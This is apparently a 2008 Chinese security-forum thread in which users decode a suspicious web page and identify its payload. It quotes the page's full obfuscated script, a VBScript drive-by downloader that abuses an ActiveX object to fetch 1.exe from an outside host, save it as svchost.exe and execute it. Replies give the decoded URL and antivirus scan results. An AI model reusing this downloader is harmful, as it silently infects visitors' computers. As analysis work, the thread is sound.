怎样解这个网页？

dearhaoji

http://88ttorg.one.2008isp.com.cn/1.htm    不知是否加密。。。如果有加密，请问怎样才能解密呢？

shmily512099

确实有毒   但是不知道怎么解   继续看看！

shmily512099

确实被加密了


<HTML>

< SCRIPT LANGUAG E=" J avascript  ">

< !-  -
do  cument.wri te(unescape("%3C  html%   3E%0D%  0A%20%20% 3Cscript% 20la n guage%3D       %2 2VBScr i pt%22%3 E %0D %0A %20   % 2 0%20%20on   % 2  0e  r r or%20re s ume % 20next% 0 D %0A %20%20 %20% 2  0d l% 20%3 D% 20  %  2 2http%3A% 2F%2F88ttorg   %  2Eone %2E2008is p% 2Eco  m% 2E cn %2F 1%2 E exe% 22 %0 D% 0 A%20%2 0%2 0 %  20 S et%20  df%20%3D %20d o cum ent%2 Ecreate Elemen t%2 8%22objec t%22%29%0D%0 A% 2  0 %20%20% 20d  f%2EsetAttrib ute% 20  %2   2classi  d%22   %2C %2   0  %22clsi d%   3ABD 96 C 556 %2 D6 5A3% 2 D11 D0%2D983A% 2D00C04F C29 E3 6 %  2 2%0D%0A%20 %2 0% 20 %20   b4 %3 D%2 2Mi%22  %0  D%0A %20%20%20 %20b5%3D%22 cr%22% 0D %0A %2 0  %2   0% 2 0%20b6%   3D%22o%22%0   D%0A  % 20% 20%2  0%2 0b7%3 D   %22soft%22%  0  D%0A%20%20 %20%20b 8   %3D%22% 2EX% 22%0D%0A% 20% 2 0    %2 0 %20b 9%3 D% 22M%22 %0 D%0A   % 20%20% 2  0%2   0b1 0   %3D%2  2L%22%0 D%0A%20% 20%20 %2 0b   11  % 3D%2 2H%2 2 %  0D%  0 A%2  0 %  20 %20%2 0 b 1 2% 3D%22T%2 2 % 0D  %0A%20% 2  0%2  0%20  b13%3D%22  T% 2 2 %0 D% 0A%20%20%20%2 0b  14%3 D%2 2P%2  2% 0D %0 A% 20%20%20 %2 0s tr b%3Db 4 %2 6b5  %   2  6b6  %26b  7  %26 b8  %26b9%26b10%26 b11%   26 b12% 26b13 % 2 6b1 4 %0 D% 0A %20% 20%2 0%20Set%20 x% 20 %  3D% 20 df%2ECreate  Ob j e c t   % 2 8strb  %2C%22  %22%29% 0D%0  A  %2 0%2 0%20   % 2 0 a4 %3D%2  2 A%22%0D%0A %20%20% 20%2 0 a5%3D% 22d%  2 2% 0 D %0A   %20 %20 %20 %    20a   6%3  D%  2  2o % 22%   0  D %0A%    2   0%20 % 2  0%20a    7 % 3 D% 22d%22%0D  % 0 A% 20%20%20% 2  0 a 8%3D %2 2 b%2   2 %0D%0A%2  0% 20%20 % 20a 9%3D%22%2E%2 2% 0D%0 A   %2 0%20%20%20a 1  0%3D% 2 2S  %22%0D%0A%  20 %20 %20   %2 0a11  %3 D%2 2t %22 %0D%0A%2 0%20%20 %2 0a12%3 D%2 2 r% 2 2%0D %0A%20%20%20%20a13% 3D %22   e% 22 % 0D %0   A%   20%20%20%20a1 4 % 3D%2 2a%22  %0 D%0  A%   2 0%20%20% 20a 15% 3D % 22  m%22% 0D% 0 A% 20%20%20  %20 s tra%3Da4% 26 a 5 %26a6  %26a7%26a8% 2 6a9 %   26a1  0 %2 6  a1  1%   26  a 12 %2 6a 13 %26a14%  2 6a15%0D % 0 A%20%20%20% 20se t  %20S %20%3D% 2 0df%2 Ecre a t eob je  c t%  28s tra%2C% 2 2%2 2%29     % 0D %0A%20 % 2 0  %20%20S%    2E type%2   0%3D%2  01 % 0D%0A %2    0 % 2 0 %2  0%20c4%  3 D%22G%22%0D% 0A% 20% 20% 20%2  0c5 %3D%2 2E%2 2% 0D%0  A%20% 20% 2 0%20  c6%3D%2 2T% 22%0D%0A% 2  0% 20 % 2 0%20 strc %3 D c 4%26 c5%2 6c6%  0D % 0 A % 20%20%20 %20x%    2EO pen% 20str c% 2 C%2 0 d l%2C%20Fal se%0D%0A%2 0%20%20%20x%2ES e nd%0 D  %0A% 20 %20%20%20  fna m    e1%3D%22s  vchost%2Eex e%22% 0  D %0A%20% 2  0 %20%   20 se  t%2 0F% 20 %3D%20df %2Ecreat eo  bject%28   %   2 2Scriptin  g%2 E Fil eS yste  mObje ct%22%2C %22%22% 2 9%0D %0A %2  0% 20%20% 20set%20tmp%20%3  D%20F%2EGe  tSp  eci alFolder%2    8 2%29%  0D % 0 A %20  %2 0  %  20 %20 S%2Eop en % 0D%0A%20% 20  % 2 0 %2  0 f  name1%3 D%20 F%2E BuildPat h%28 tm p %2 Cfname  1%29% 0D%0A % 2 0%20%  2    0%20 S%2E wri t e% 20x%2Ere s p   onse  B od y%0 D%0A %20%20 %20%20S%2 Esave tof     ile%20fname1  %2C2% 0 D%0A%20%2  0  %  20 %2 0 S%2Ec lose%0D  %0 A%20%  20%2 0%2  0set%20Q %20% 3D%20 df%2  E c reateobject%28%22Shell %2EApplica  tion%22% 2C  %22% 22%29 %0 D%0A%20% 20 %  20%2 0Q % 2 EShe l lExecute%2 0fname1 %2C%22% 2 2%2C%22% 22%2 C%22ope n%22    % 2C0 %0D%0 A%20 % 20%20%  20 %3C%2 Fs crip t %3E% 0 D% 0 A%20%20 %20%20 % 3Chead %3 E%0D% 0A%2  0%20% 20%20%  3Ct it le %3E% u6B63%u5728%u52A0%u  8F7D%u8B F7%u7 A0 D  %u7B49%3C% 2  F  ti tle%3 E% 0D %0A% 2 0 %20%2 0%2  0 %3C%  2F hea d % 3 E%3Cbo dy%3E %0D% 0 A% 20%   20%20%20%3C%2Fbod y    %   3E %3C%2  Fh t m l% 3 E%0D%0A") )  
// --> </S CRIPT>

< /HTML>

dearhaoji

怎样解的？？麻烦请说出解密方法！谢谢啦！！！！

shmily512099

还没解呢    目前还在研究中 估计也要找人求救咯

dearhaoji

http://88ttorg.one.2008isp.com.cn/1.exe  这是网吗下载地址。。但是我不会解密。。只是估计成功才找到的。。

shmily512099

居然解出来了


http://88ttorg.one.2008isp.com.cn/1.exe  就是这个啦

tanlimo

去空格，在freshow中一个decode就出来了

http://88ttorg.one.2008isp.com.cn/1.exe

[ 本帖最后由 tanlimo 于 2008-11-30 12:50 编辑 ]

花间酒

刚解好发觉白费功夫了
http://virscan.org/report/1e386ad70ee37afa37ea8a871840210f.html
http://virscan.org/report/831a3b8a85a7c512a1d07de25a9a1e6f.html

大多报了。
1.exe 过星星 ，赛门，咖啡

[ 本帖最后由 lunglungyu 于 2008-11-30 12:55 编辑 ]

syfwxmh

kaspersky
kill all
（解压后有两个病毒）